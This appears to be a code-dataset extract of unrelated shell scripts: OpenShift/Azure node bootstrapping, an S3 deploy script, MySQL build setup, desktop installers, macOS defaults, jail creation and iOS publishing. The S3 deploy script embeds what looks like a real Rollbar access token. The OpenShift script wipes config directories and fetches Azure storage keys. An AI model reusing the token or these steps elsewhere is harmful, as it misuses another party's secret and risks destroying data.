code (string, 2-1.05M) | repo_name (string, 5-110) | path (string, 3-922) | language (1 class) | license (15 classes) | size (int64, 2-1.05M)
---|---|---|---|---|---
#!/bin/bash -ex
# TODO: /etc/dnsmasq.d/origin-upstream-dns.conf is currently hardcoded; it
# probably shouldn't be
if [ -f "/etc/sysconfig/atomic-openshift-node" ]; then
SERVICE_TYPE=atomic-openshift
else
SERVICE_TYPE=origin
fi
VERSION="$(rpm -q $SERVICE_TYPE --queryformat %{VERSION})"
if [ -f "/etc/sysconfig/atomic-openshift-node" ]; then
ANSIBLE_DEPLOY_TYPE="openshift-enterprise"
IMAGE_TYPE=ose
IMAGE_PREFIX="registry.access.redhat.com/openshift3"
ANSIBLE_CONTAINER_VERSION="v${VERSION}"
PROMETHEUS_EXPORTER_VERSION="v${VERSION}"
COCKPIT_PREFIX="${IMAGE_PREFIX}"
COCKPIT_BASENAME="registry-console"
COCKPIT_VERSION="v${VERSION}"
else
ANSIBLE_DEPLOY_TYPE="origin"
IMAGE_TYPE="${SERVICE_TYPE}"
IMAGE_PREFIX="openshift"
# FIXME: These versions are set to deal with differences in how Origin and OCP
# components are versioned
ANSIBLE_CONTAINER_VERSION="v${VERSION%.*}"
COCKPIT_PREFIX="cockpit"
COCKPIT_BASENAME="kubernetes"
COCKPIT_VERSION="latest"
fi
systemctl restart docker.service
echo "BOOTSTRAP_CONFIG_NAME=node-config-master" >>/etc/sysconfig/${SERVICE_TYPE}-node
for dst in tcp,2379 tcp,2380 tcp,8443 tcp,8444 tcp,8053 udp,8053 tcp,9090; do
proto=${dst%%,*}
port=${dst##*,}
iptables -A OS_FIREWALL_ALLOW -p $proto -m state --state NEW -m $proto --dport $port -j ACCEPT
done
iptables-save >/etc/sysconfig/iptables
sed -i -e "s#--master=.*#--master=https://$(hostname --fqdn):8443#" /etc/sysconfig/${SERVICE_TYPE}-master-api
sed -i -e "s#--loglevel=2#--loglevel=4#" /etc/sysconfig/${SERVICE_TYPE}-master-api
sed -i -e "s#--loglevel=2#--loglevel=4#" /etc/sysconfig/${SERVICE_TYPE}-master-controllers
rm -rf /etc/etcd/* /etc/origin/master/* /etc/origin/node/*
oc adm create-bootstrap-policy-file --filename=/etc/origin/master/policy.json
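# unpack the templated config bundle (a base64-encoded tarball) over the freshly cleaned config directories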
( cd / && base64 -d <<< {{ .ConfigBundle }} | tar -xz)
cp /etc/origin/node/ca.crt /etc/pki/ca-trust/source/anchors/openshift-ca.crt
update-ca-trust
# FIXME: It is horrible that we're installing az. Try to avoid adding
# additional functionality in this script that requires it. One route to remove
# this code is to bake this script into the base image, then pass in parameters
# such as the registry storage account name and key direct from ARM.
rpm -i https://packages.microsoft.com/yumrepos/azure-cli/azure-cli-2.0.31-1.el7.x86_64.rpm
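# turn off command tracing while handling service-principal credentials so secrets are not echoed to the log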
set +x
. <(sed -e 's/: */=/' /etc/azure/azure.conf)
az login --service-principal -u "$aadClientId" -p "$aadClientSecret" --tenant "$aadTenantId" &>/dev/null
REGISTRY_STORAGE_AZURE_ACCOUNTNAME=$(az storage account list -g "$resourceGroup" --query "[?ends_with(name, 'registry')].name" -o tsv)
REGISTRY_STORAGE_AZURE_ACCOUNTKEY=$(az storage account keys list -g "$resourceGroup" -n "$REGISTRY_STORAGE_AZURE_ACCOUNTNAME" --query "[?keyName == 'key1'].value" -o tsv)
az logout
set -x
###
# resolve the router's public IP via DNS and substitute it into routingConfig.subdomain
###
routerLBHost="{{.RouterLBHostname}}"
routerLBIP=$(dig +short $routerLBHost)
# NOTE: The version of openshift-ansible for origin defaults the ansible var
# openshift_prometheus_node_exporter_image_version correctly as needed by
# origin, but for OCP it does not.
#
# This is fixed in openshift/openshift-ansible@c27a0f4, which is in
# openshift-ansible >= 3.9.15, so once we're shipping OCP >= v3.9.15 we
# can remove this and the definition of the corresponding variable in the
# ansible inventory file.
if [[ "${ANSIBLE_DEPLOY_TYPE}" == "origin" ]]; then
sed -i "/PROMETHEUS_EXPORTER_VERSION/d" /tmp/ansible/azure-local-master-inventory.yml
else
sed -i "s|PROMETHEUS_EXPORTER_VERSION|${PROMETHEUS_EXPORTER_VERSION}|g;" /tmp/ansible/azure-local-master-inventory.yml
fi
for i in /etc/origin/master/master-config.yaml /tmp/bootstrapconfigs/* /tmp/ansible/azure-local-master-inventory.yml; do
sed -i "s/TEMPROUTERIP/${routerLBIP}/; s|IMAGE_PREFIX|$IMAGE_PREFIX|g; s|ANSIBLE_DEPLOY_TYPE|$ANSIBLE_DEPLOY_TYPE|g" $i
sed -i "s|REGISTRY_STORAGE_AZURE_ACCOUNTNAME|${REGISTRY_STORAGE_AZURE_ACCOUNTNAME}|g; s|REGISTRY_STORAGE_AZURE_ACCOUNTKEY|${REGISTRY_STORAGE_AZURE_ACCOUNTKEY}|g" $i
sed -i "s|COCKPIT_VERSION|${COCKPIT_VERSION}|g; s|COCKPIT_BASENAME|${COCKPIT_BASENAME}|g; s|COCKPIT_PREFIX|${COCKPIT_PREFIX}|g;" $i
sed -i "s|VERSION|${VERSION}|g; s|SHORT_VER|${VERSION%.*}|g; s|SERVICE_TYPE|${SERVICE_TYPE}|g; s|IMAGE_TYPE|${IMAGE_TYPE}|g" $i
sed -i "s|HOSTNAME|${HOSTNAME}|g;" $i
done
# note: ${SERVICE_TYPE}-node crash loops until master is up
for unit in etcd.service ${SERVICE_TYPE}-master-api.service ${SERVICE_TYPE}-master-controllers.service; do
systemctl enable $unit
systemctl start $unit
done
mkdir -p /root/.kube
cp /etc/origin/master/admin.kubeconfig /root/.kube/config
export KUBECONFIG=/etc/origin/master/admin.kubeconfig
while ! curl -o /dev/null -m 2 -kfs https://localhost:8443/healthz; do
sleep 1
done
while ! oc get svc kubernetes &>/dev/null; do
sleep 1
done
oc create -f - <<'EOF'
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: azure
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/azure-disk
parameters:
skuName: Premium_LRS
location: {{ .Location }}
kind: managed
EOF
oc create configmap node-config-master --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/master-config.yaml
oc create configmap node-config-compute --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/compute-config.yaml
oc create configmap node-config-infra --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/infra-config.yaml
# must start ${SERVICE_TYPE}-node after master is fully up and running
# otherwise the implicit dns change may cause master startup to fail
systemctl enable ${SERVICE_TYPE}-node.service
systemctl start ${SERVICE_TYPE}-node.service &
chmod +x /tmp/ansible/ansible.sh
docker run \
--rm \
-u "$(id -u)" \
-v /etc/origin:/etc/origin:z \
-v /tmp/ansible:/opt/app-root/src:z \
-v /root/.kube:/opt/app-root/src/.kube:z \
-w /opt/app-root/src \
-e IMAGE_BASE="${IMAGE_PREFIX}/${IMAGE_TYPE}" \
-e VERSION="$VERSION" \
-e HOSTNAME="$(hostname)" \
--network="host" \
"${IMAGE_PREFIX}/${IMAGE_TYPE}-ansible:${ANSIBLE_CONTAINER_VERSION}" \
/opt/app-root/src/ansible.sh
|
rjtsdl/acs-engine
|
parts/openshift/release-3.9/openshiftmasterscript.sh
|
Shell
|
mit
| 6,338 |
#!/bin/bash
# Typically this is the Project name.
# The trailing slash is important
# Can be set to an empty string for working at the top level of the bucket
S3_BUCKET_PREFIX=''
# AWS CloudFront distribution ID
DISTRIBUTION_ID='EGVC56LSD4VPJ'
# AWS CloudFront distribution domain (not used as there are multiple domains for this project, see s3_website.yml)
# DISTRIBUTION_DOMAIN='sagemodeler.concord.org'
# name of branch to deploy to root of site
ROOT_BRANCH='production'
# Bucket to deploy to, typically this is 'model-resources', but some projects
# have their own buckets
S3_BUCKET='building-models-app.concord.org'
# location of built files
SRC_DIR='dist'
# exit when any command fails
set -e
# keep track of the last executed command
trap 'last_command=$current_command; current_command=$BASH_COMMAND' DEBUG
# echo an error message if exiting due to a failure
trap 'code=$?; if [ $code -ne 0 ]; then echo "\"${last_command}\" command exited with code $code."; fi' EXIT
# extract current TAG if present
# the 2> is to prevent error messages when no match is found
# the || echo prevents script exit when it doesn't match
CURRENT_TAG=`git describe --tags --exact-match $GITHUB_SHA 2> /dev/null || echo ''`
# Extract the branch or tag name from the GITHUB_REF
# it should be either refs/heads/branch-name
# or refs/tags/v1.2.3
# since we ought to know if this is a branch or tag based on the ref
# we could simplify the CURRENT_TAG approach above
BRANCH_OR_TAG=${GITHUB_REF#refs/*/}
echo branch or tag: $BRANCH_OR_TAG
# strip PT ID from branch name for branch builds
DEPLOY_DIR_NAME=$BRANCH_OR_TAG
PT_PREFIX_REGEX="^([0-9]{8,}-)(.+)$"
PT_SUFFIX_REGEX="^(.+)(-[0-9]{8,})$"
if [[ $DEPLOY_DIR_NAME =~ $PT_PREFIX_REGEX ]]; then
DEPLOY_DIR_NAME=${BASH_REMATCH[2]}
fi
if [[ $DEPLOY_DIR_NAME =~ $PT_SUFFIX_REGEX ]]; then
DEPLOY_DIR_NAME=${BASH_REMATCH[1]}
fi
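# e.g. "12345678-fix-header" and "fix-header-12345678" both reduce to "fix-header"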
# tagged builds deploy to /version/TAG_NAME
if [ "$BRANCH_OR_TAG" = "$CURRENT_TAG" ]; then
mkdir -p _site/version
S3_DEPLOY_DIR="version/$BRANCH_OR_TAG"
DEPLOY_DEST="_site/$S3_DEPLOY_DIR"
INVAL_PATH="/version/$BRANCH_OR_TAG/index.html"
# in this case we are going to deploy this code to a subfolder of version
# So ignore everything except this folder.
# Currently this only escapes `.`
S3_DEPLOY_DIR_ESCAPED=$(sed 's/[.]/[&]/g;' <<<"$S3_DEPLOY_DIR")
IGNORE_ON_SERVER="^(?!$S3_BUCKET_PREFIX$S3_DEPLOY_DIR_ESCAPED/)"
# root branch builds deploy to root of site
elif [ "$BRANCH_OR_TAG" = "$ROOT_BRANCH" ]; then
DEPLOY_DEST="_site"
INVAL_PATH="/index.html"
# in this case we are going to deploy this branch to the top level
# so we need to ignore the version and branch folders
IGNORE_ON_SERVER="^$S3_BUCKET_PREFIX(version/|branch/)"
# branch builds deploy to /branch/BRANCH_NAME
else
mkdir -p _site/branch
S3_DEPLOY_DIR="branch/$DEPLOY_DIR_NAME"
DEPLOY_DEST="_site/$S3_DEPLOY_DIR"
INVAL_PATH="/branch/$DEPLOY_DIR_NAME/index.html"
# in this case we are going to deploy this code to a subfolder of branch
# So ignore everything except this folder.
# Currently this only escapes `.`
S3_DEPLOY_DIR_ESCAPED=$(sed 's/[.]/[&]/g;' <<<"$S3_DEPLOY_DIR")
IGNORE_ON_SERVER="^(?!$S3_BUCKET_PREFIX$S3_DEPLOY_DIR_ESCAPED/)"
fi
# used by s3_website.yml
export S3_BUCKET_PREFIX
export IGNORE_ON_SERVER
export DISTRIBUTION_ID
# export DISTRIBUTION_DOMAIN
export S3_BUCKET
# copy files to destination
mv $SRC_DIR $DEPLOY_DEST
# deploy the site contents
echo Deploying "$BRANCH_OR_TAG" to "$S3_BUCKET:$S3_BUCKET_PREFIX$S3_DEPLOY_DIR"...
echo Pushing to S3
s3_website push --site _site
# Let rollbar know of our new deployment:
# https://rollbar.com/knowuh/Sage deployment tracking
ACCESS_TOKEN=daa3852e6c4f46008fc4043793a0ff38
if [ "$BRANCH_OR_TAG" = "production" ]; then
ENVIRONMENT="production"
elif [ "$BRANCH_OR_TAG" = "master" ]; then
ENVIRONMENT="staging"
else
ENVIRONMENT="development"
fi
REVISION=`git log -n 1 --pretty=format:"%h"`
echo "Sending deploy notice to rollbar.com"
curl https://api.rollbar.com/api/1/deploy/ \
-F access_token=$ACCESS_TOKEN \
-F environment=$ENVIRONMENT \
-F revision="\`$REVISION $BRANCH_OR_TAG\`" \
-F local_username=Travis \
-F comment="available at https://sage.concord.org/branch/$BRANCH_OR_TAG/"
# explicit CloudFront invalidation to workaround s3_website gem invalidation bug
# with origin path (https://github.com/laurilehmijoki/s3_website/issues/207).
echo Invalidating CloudFront at "$INVAL_PATH"...
aws cloudfront create-invalidation --distribution-id $DISTRIBUTION_ID --paths $INVAL_PATH
|
concord-consortium/building-models
|
s3_deploy.sh
|
Shell
|
mit
| 4,499 |
#!/bin/bash
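# Usage: ./start_local_client.sh [test_method] [client_num] [packet_size]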
test_method=$1
client_num=$2
packet_size=$3
test_method=${test_method:-pingpong}
client_num=${client_num:-10}
packet_size=${packet_size:-64}
# echo "test_method = $test_method"
# echo "client_num = $client_num"
# echo "packet_size = $packet_size"
for ((i=0; i<$client_num; i++));
do
./asio_echo_client --host=127.0.0.1 --port=8090 --mode=echo --test=$test_method --packet-size=$packet_size &
done
|
shines77/netlib_test
|
start_local_client.sh
|
Shell
|
mit
| 417 |
#!/bin/sh -e
SYSTEM=$(uname)
if [ "${SYSTEM}" = Darwin ]; then
SED='gsed'
else
SED='sed'
fi
VENDOR_NAME_CAMEL='FunTimeCoding'
export VENDOR_NAME_CAMEL
PROJECT_NAME_CAMEL='PythonSkeleton'
export PROJECT_NAME_CAMEL
PROJECT_NAME_DASH='python-skeleton'
export PROJECT_NAME_DASH
PROJECT_NAME_UNDERSCORE=$(echo "${PROJECT_NAME_DASH}" | ${SED} --regexp-extended 's/-/_/g')
export PROJECT_NAME_UNDERSCORE
PROJECT_NAME_INITIALS=$(echo "${PROJECT_NAME_CAMEL}" | ${SED} 's/\([A-Z]\)[a-z]*/\1/g' | tr '[:upper:]' '[:lower:]')
BLOCKED_INITIALS='ps
pu'
echo "${PROJECT_NAME_INITIALS}" | grep --quiet "^${BLOCKED_INITIALS}$" && ARE_INITIALS_BLOCKED=true || ARE_INITIALS_BLOCKED=false
if [ "${ARE_INITIALS_BLOCKED}" = true ]; then
PROJECT_NAME_INITIALS=$(echo "${PROJECT_NAME_CAMEL}" | ${SED} 's/\([A-Z][a-z]\)[a-z]*/\1/g' | tr '[:upper:]' '[:lower:]')
fi
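# e.g. "PythonSkeleton" yields "ps", which is blocked, so the fallback above produces "pysk"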
export PROJECT_NAME_INITIALS
PROJECT_VERSION='0.1.0'
export PROJECT_VERSION
PACKAGE_VERSION='1'
export PACKAGE_VERSION
MAINTAINER='Alexander Reitzel'
export MAINTAINER
EMAIL='[email protected]'
export EMAIL
COMBINED_VERSION="${PROJECT_VERSION}-${PACKAGE_VERSION}"
export COMBINED_VERSION
VENDOR_NAME_LOWER=$(echo "${VENDOR_NAME_CAMEL}" | tr '[:upper:]' '[:lower:]')
export VENDOR_NAME_LOWER
# build, tmp, .git, .idea, .scannerwork, .tox, .cache, __pycache__, *.egg-info: Nothing will ever have to be replaced by this.
# vendor: Do not break php-skeleton based projects when synchronizing with them.
# node_modules: Do not break java-script-skeleton based projects.
# target: Do not break java-skeleton based projects.
# shellcheck disable=SC1117
EXCLUDE_FILTER='^.*\/(build|tmp|vendor|node_modules|target|\.git|\.vagrant|\.idea|\.scannerwork|\.tox|\.cache|__pycache__|[a-z_]+\.egg-info)\/.*$'
export EXCLUDE_FILTER
# lib: shell, ruby
# src: php, java, clojure, scala, c-sharp
# test: php
# benchmark: php
# tests: python
# spec: ruby
# PROJECT_NAME_UNDERSCORE: python
# TODO: Test and expand this through all skeleton projects.
# shellcheck disable=SC1117
INCLUDE_FILTER="^\.\/((src|test|benchmark|tests|spec|lib|debian|configuration|documentation|test|script\/skeleton|helm-chart|${PROJECT_NAME_UNDERSCORE})\/.*|\.gitignore|Vagrantfile|Dockerfile|README.md|package\.json|sonar-project\.properties|web\/index\.html|composer\.json|setup\.py|pom.xml|.*\.gemspec|.*\.cabal)$"
export INCLUDE_FILTER
INCLUDE_STILL_FILTER='^.*\/__pycache__\/.*$'
export INCLUDE_STILL_FILTER
EXCLUDE_DOCUMENTATION_FILTER='^\.\/(documentation\/dictionary)\/.*$'
export EXCLUDE_DOCUMENTATION_FILTER
|
FunTimeCoding/python-skeleton
|
configuration/project.sh
|
Shell
|
mit
| 2,561 |
#! /bin/bash
source "$HOME/seartipy/dotfiles/scripts/utils.sh"
common_install() {
sudo apt install --no-install-recommends arc-theme ttf-ubuntu-font-family policykit-1
}
i3_install() {
sudo apt install --no-install-recommends i3 i3status
}
lxde_install() {
sudo apt install --no-install-recommends lxde-core lxsession-logout lxde-common lxdm obconf lxappearance arc-theme ttf-ubuntu-font-family lxterminal lxpolkit
}
xfce_install() {
# lxdm does not work for some reason
sudo apt install --no-install-recommends xfce4 xfce4-terminal slim
}
mate_install() {
# might need to install mate-applets-common at least, may want mate-control-center too
# you need to set window manager, as marco is not installed
sudo apt install --no-install-recommends mate-desktop mate-panel mate-polkit mate-session-manager mate-settings-daemon dconf-editor slim mate-terminal
}
mate_recommended_install() {
# might need to install mate-applets-common at least, may want mate-control-center too
# you need to set window manager, as marco is not installed
sudo apt install --no-install-recommends mate-desktop mate-panel mate-polkit mate-session-manager mate-settings-daemon dconf-editor slim mate-terminal mate-control-center mate-applet-topmenu tilda
}
budgie_install() {
sudo apt install --no-install-recommends budgie-core gdm gnome-terminal
}
gnome_install() {
sudo apt install --no-install-recommends gnome-session gdm gnome-terminal
}
gnome_recommended_install() {
sudo apt install --no-install-recommends gnome-session gdm gnome-terminal gnome-tweak-tool gnome-control-center
}
is_yakkety || err_exit "currently only Ubuntu 16.10 supported"
|
pervezfunctor/dotfiles
|
scripts/desktop-installer.sh
|
Shell
|
mit
| 1,694 |
#!/bin/bash
# set reasonable macOS defaults
# inspired by : https://github.com/mathiasbynens/dotfiles
# more can be found here : https://gist.github.com/brandonb927/3195465
if [ "$(uname -s)" != "Darwin" ]; then
exit 0
fi
set +e
echo " › Automatically quit printer app once the print jobs complete"
defaults write com.apple.print.PrintingPrefs "Quit When Finished" -bool true
echo " › Use AirDrop over every interface. srsly this should be a default."
defaults write com.apple.NetworkBrowser BrowseAllInterfaces 1
echo " › Reveal IP address, hostname, OS version, etc. when clicking the clock in the login window"
sudo defaults write /Library/Preferences/com.apple.loginwindow AdminHostInfo HostName
echo " › show the ~/Library folder"
chflags nohidden ~/Library
echo " › Open Finder in list view"
defaults write com.apple.Finder FXPreferredViewStyle Nlsv
echo " › disable smart quotes and smart dashes as they're annoying when typing code"
defaults write NSGlobalDomain NSAutomaticQuoteSubstitutionEnabled -bool false
defaults write NSGlobalDomain NSAutomaticDashSubstitutionEnabled -bool false
echo " › Show path bar"
defaults write com.apple.finder ShowPathbar -bool true
echo " › Requiring password immediately after sleep or screen saver begins"
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
echo " › Disable the menubar transparency? (y/n)"
read -r response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]; then
defaults write com.apple.universalaccess reduceTransparency -bool true
fi
echo " › Disable auto-correct? (y/n)"
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
|
redconfetti/dotfiles
|
roles/macos/files/set-defaults.sh
|
Shell
|
mit
| 1,726 |
#!/bin/bash
# check that we are running as root
if [ "$(whoami)" != "root" ] ; then
  echo "Error: this script must be run as root"
  exit 1
fi
# First create some directories. The top one will be the jail.
# Under that we will create directories that look like the ones
# that you would see in a root file system.
D="$1"
U="$2"
G="$3"
if [ -z "${D}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - PathToJail can not be empty"
exit 1
fi
if [ -z "${U}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - UserToCreate can not be empty"
exit 1
fi
if [ -z "${G}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - GroupToUse can not be empty"
exit 1
fi
mkdir -p ${D}/bin
mkdir -p ${D}/home/emailrelay
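# NOTE: this home directory name is hardcoded; it assumes UserToCreate is "emailrelay"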
mkdir -p ${D}/etc
mkdir -p ${D}/dev
mkdir -p ${D}/tmp
mkdir -p ${D}/lib
mkdir -p ${D}/lib64
mkdir -p ${D}/var/log
# Now let's create some devices that programs will need.
cd ${D}/dev
/bin/mknod -m 0666 ${D}/dev/null c 1 3
/bin/mknod -m 0666 ${D}/dev/random c 1 8
/bin/mknod -m 0444 ${D}/dev/urandom c 1 9
# Now the account that the program will run under.
groupadd ${G}
useradd -m -s /bin/false -d ${D}/home/${U} -g ${G} ${U}
# Now the directory where the executable will be.
cd ${D}/home/${U}
mkdir -p Projects/email-relay/log
chown -R ${U}:${G} *
# While I am in the login directory for this new user I will take a look
# at any extra files that may have been created. I usually remove them.
ls -a
rm -rf .mozilla
echo "Should copy in the executable now and then run part 2, ./create-jail-pt2.sh"
|
pschlump/daemon-it
|
example/create-jail.sh
|
Shell
|
mit
| 1,582 |
function failed() {
echo "Failed: $@" >&2
exit 1
}
# current working directory
CURRENT_DIR=${PWD}
# resolve the directory containing this script
SCRIPT_DIR_RELATIVE=`dirname $0`
SCRIPT_DIR=`cd ${SCRIPT_DIR_RELATIVE}; pwd`
echo "SCRIPT_DIR = ${SCRIPT_DIR}"
# read the publish configuration
. ${SCRIPT_DIR}/iosPublish.config
mkdir -pv ${APP_DIR} || failed "mkdir ${APP_DIR}"
cd ${PROJECT_DIR} || failed "cd ${PROJECT_DIR}"
# clean
xcodebuild -workspace ${WORKSPACE_NAME}.xcworkspace -scheme ${SCHEME_NAME} -sdk ${SDK_VERSION} -configuration ${CONFIGURATION} ONLY_ACTIVE_ARCH=NO clean || failed "xcodebuild clean"
# archive
xcodebuild -workspace ${WORKSPACE_NAME}.xcworkspace -scheme ${SCHEME_NAME} -sdk ${SDK_VERSION} -configuration ${CONFIGURATION} -destination ${ARCHIVE_DESTINATION} -archivePath ${APP_DIR}/${APP_NAME}.xcarchive ONLY_ACTIVE_ARCH=NO archive || failed "xcodebuild archive"
# export ipa
TIMESTAMP=`date "+%Y_%m_%d_%H_%M_%S"`
IPA_PATH_NO_SUFFIX=${APP_DIR}/${APP_NAME}_${TIMESTAMP}
xcodebuild -exportArchive -archivePath ${APP_DIR}/${APP_NAME}.xcarchive -exportPath ${IPA_PATH_NO_SUFFIX} -exportProvisioningProfile "${PROFILE_NAME}" -exportFormat ipa -verbose || failed "xcodebuild export archive"
# upload to fir.im
fir publish ${IPA_PATH_NO_SUFFIX}.ipa -T ${FIR_TOKEN} || failed "fir publish"
cd ${CURRENT_DIR}
echo "done..."
|
GreedBell/resource
|
shell/iosPublish/iosPublish.sh
|
Shell
|
mit
| 1,309 |
#!/bin/bash
echo 'Available PyPI servers on your ~/.pypirc:'
python bin/pypi-servers.py
echo
read -r -p "Choose PyPI index-server: " PYPI_SERVER
python setup.py -q sdist upload -r "$PYPI_SERVER"
|
globocom/alf
|
bin/upload.sh
|
Shell
|
mit
| 197 |
#!/bin/bash
cpuTemp0=$(cat /sys/class/thermal/thermal_zone0/temp)
cpuTemp1=$(($cpuTemp0/1000))
cpuTemp2=$(($cpuTemp0/100))
cpuTempM=$(($cpuTemp2 % $cpuTemp1))
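# cpuTempM is the first decimal digit; the modulo trick assumes cpuTemp1 > 9 (CPU above 10 C)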
# TODO: Add the degree symbol once we get tmux and fbterm stuff set up
# TODO: Get rid of the apostrophe in the GPU temperature readout
# TODO: what about the quad core stuff of Raspberry Pi 2?
# TODO: Color code thermal temperatures. Green, yellow, orange, red. Red is bad!
cputemp=$(echo "$cpuTemp1.$cpuTempM C")
gputemp=$(/opt/vc/bin/vcgencmd measure_temp | sed -n "s/'/ /;p" | sed -n 's/temp=//p')
# echo "CPU temp=$cpuTemp1.$cpuTempM C"
# echo GPU $gputemp
echo "CPU $cputemp GPU $gputemp"
|
jrcharney/hacktop
|
scripts/thermal.sh
|
Shell
|
mit
| 656 |
#!/bin/sh
if test ! -f sql/mysqld.cc
then
echo "You must run this script from the MySQL top-level directory"
exit 1
fi
prefix_configs="--prefix=/usr/local/mysql"
just_print=
just_configure=
full_debug=
if test -n "$MYSQL_BUILD_PREFIX"
then
prefix_configs="--prefix=$MYSQL_BUILD_PREFIX"
fi
while test $# -gt 0
do
case "$1" in
--prefix=* ) prefix_configs="$1"; shift ;;
--with-debug=full ) full_debug="=full"; shift ;;
-c | --just-configure ) just_configure=1; shift ;;
-n | --just-print | --print ) just_print=1; shift ;;
-h | --help ) cat <<EOF; exit 0 ;;
Usage: $0 [-h|-n] [configure-options]
-h, --help Show this help message.
-n, --just-print Don't actually run any commands; just print them.
-c, --just-configure Stop after running configure.
--with-debug=full Build with full debug.
--prefix=path Build with prefix 'path'.
Note: this script is intended for internal use by MySQL developers.
EOF
* )
echo "Unknown option '$1'"
echo "Use -h or --help for usage"
exit 1
break ;;
esac
done
set -e
export AM_MAKEFLAGS
AM_MAKEFLAGS="-j 4"
# SSL library to use.
SSL_LIBRARY=--with-yassl
# If you are not using codefusion add "-Wpointer-arith" to WARNINGS
# The following warning flag will give too many warnings:
# -Wunused -Winline (The later isn't usable in C++ as
# __attribute()__ doesn't work with gnu C++)
global_warnings="-Wimplicit -Wreturn-type -Wswitch -Wtrigraphs -Wcomment -W -Wchar-subscripts -Wformat -Wparentheses -Wsign-compare -Wwrite-strings -Wunused-function -Wunused-label -Wunused-value -Wunused-variable"
#
# For more warnings, uncomment the following line
# global_warnings="$global_warnings -Wshadow"
c_warnings="$global_warnings -Wunused"
cxx_warnings="$global_warnings -Woverloaded-virtual -Wsign-promo -Wreorder -Wctor-dtor-privacy -Wnon-virtual-dtor"
base_max_configs="--with-innodb --with-ndbcluster --with-archive-storage-engine --with-big-tables --with-blackhole-storage-engine --with-federated-storage-engine --with-csv-storage-engine $SSL_LIBRARY"
base_max_no_ndb_configs="--with-innodb --without-ndbcluster --with-archive-storage-engine --with-big-tables --with-blackhole-storage-engine --with-federated-storage-engine --with-csv-storage-engine $SSL_LIBRARY"
max_leave_isam_configs="--with-innodb --with-ndbcluster --with-archive-storage-engine --with-federated-storage-engine --with-blackhole-storage-engine --with-csv-storage-engine $SSL_LIBRARY --with-embedded-server --with-big-tables"
max_configs="$base_max_configs --with-embedded-server"
max_no_ndb_configs="$base_max_no_ndb_configs --with-embedded-server"
path=`dirname $0`
. "$path/check-cpu"
alpha_cflags="$check_cpu_cflags -Wa,-m$cpu_flag"
amd64_cflags="$check_cpu_cflags"
pentium_cflags="$check_cpu_cflags"
pentium64_cflags="$check_cpu_cflags -m64"
ppc_cflags="$check_cpu_cflags"
sparc_cflags=""
# be as fast as we can be without losing our ability to backtrace
fast_cflags="-O3 -fno-omit-frame-pointer"
# this one is for someone who thinks 1% speedup is worth not being
# able to backtrace
reckless_cflags="-O3 -fomit-frame-pointer "
debug_cflags="-DUNIV_MUST_NOT_INLINE -DEXTRA_DEBUG -DFORCE_INIT_OF_VARS -DSAFEMALLOC -DPEDANTIC_SAFEMALLOC -DSAFE_MUTEX"
debug_extra_cflags="-O1 -Wuninitialized"
base_cxxflags="-felide-constructors -fno-exceptions -fno-rtti"
amd64_cxxflags="" # If dropping '--with-big-tables', add here "-DBIG_TABLES"
base_configs="$prefix_configs --enable-assembler --with-extra-charsets=complex --enable-thread-safe-client --with-big-tables"
if test -d "$path/../cmd-line-utils/readline"
then
base_configs="$base_configs --with-readline"
elif test -d "$path/../cmd-line-utils/libedit"
then
base_configs="$base_configs --with-libedit"
fi
static_link="--with-mysqld-ldflags=-all-static --with-client-ldflags=-all-static"
amd64_configs=""
alpha_configs="" # Not used yet
pentium_configs=""
sparc_configs=""
# we need local-infile in all binaries for rpl000001
# if you need to disable local-infile in the client, write a build script
# and unset local_infile_configs
local_infile_configs="--enable-local-infile"
debug_configs="--with-debug$full_debug"
if [ -z "$full_debug" ]
then
debug_cflags="$debug_cflags $debug_extra_cflags"
fi
if gmake --version > /dev/null 2>&1
then
make=gmake
else
make=make
fi
if test -z "$CC" ; then
CC=gcc
fi
if test -z "$CXX" ; then
CXX=gcc
fi
# If ccache (a compiler cache which reduces build time)
# (http://samba.org/ccache) is installed, use it.
# We use 'grep' and hope 'grep' will work as expected
# (returns 0 if finds lines)
if ccache -V > /dev/null 2>&1
then
echo "$CC" | grep "ccache" > /dev/null || CC="ccache $CC"
echo "$CXX" | grep "ccache" > /dev/null || CXX="ccache $CXX"
fi
# gcov
# The -fprofile-arcs and -ftest-coverage options cause GCC to instrument the
# code with profiling information used by gcov.
# The -DDISABLE_TAO_ASM is needed to avoid build failures in Yassl.
# The -DHAVE_gcov enables code to write out coverage info even when crashing.
gcov_compile_flags="-fprofile-arcs -ftest-coverage"
gcov_compile_flags="$gcov_compile_flags -DDISABLE_TAO_ASM"
gcov_compile_flags="$gcov_compile_flags -DMYSQL_SERVER_SUFFIX=-gcov -DHAVE_gcov"
# GCC4 needs -fprofile-arcs -ftest-coverage on the linker command line (as well
# as on the compiler command line), and this requires setting LDFLAGS for BDB.
gcov_link_flags="-fprofile-arcs -ftest-coverage"
gcov_configs="--disable-shared"
# gprof
gprof_compile_flags="-O2 -pg -g"
gprof_link_flags="--disable-shared $static_link"
|
pieter/mysql-server
|
BUILD/SETUP.sh
|
Shell
|
gpl-2.0
| 5,583 |
#!/usr/bin/env bash
#
# jsonv 0.2.0
# A Bash command line tool for converting JSON to CSV
#
# Copyright (c) 2013 Paul Engel, released under the MIT license
# https://github.com/archan937/jsonv.sh
#
# Get a JSON file
#
# Example (e.g. example.json)
#
# [
# {
# "name": "Dagny Taggart",
# "id": 1,
# "age": 39
# }, {
# "name": "Francisco D'Anconia",
# "id": 8,
# "age": 40
# }, {
# "name": "Hank Rearden (a.k.a \"The Tank\")",
# "id": 12,
# "age": 46
# }
# ]
#
# Command line usage
#
# Call `jsonv` and pass the paths of the values used for the CSV columns (comma separated).
# Optionally, you can pass a prefix for the paths as a second argument.
#
# Example
#
# $ cat examples/simple.json | ./jsonv id,name,age
# 1,"Dagny Taggart",39
# 8,"Francisco D'Anconia",40
# 12,"Hank Rearden (a.k.a \"The Tank\")",46
#
# $ cat examples/simple.json | ./jsonv id,name,age > example.csv
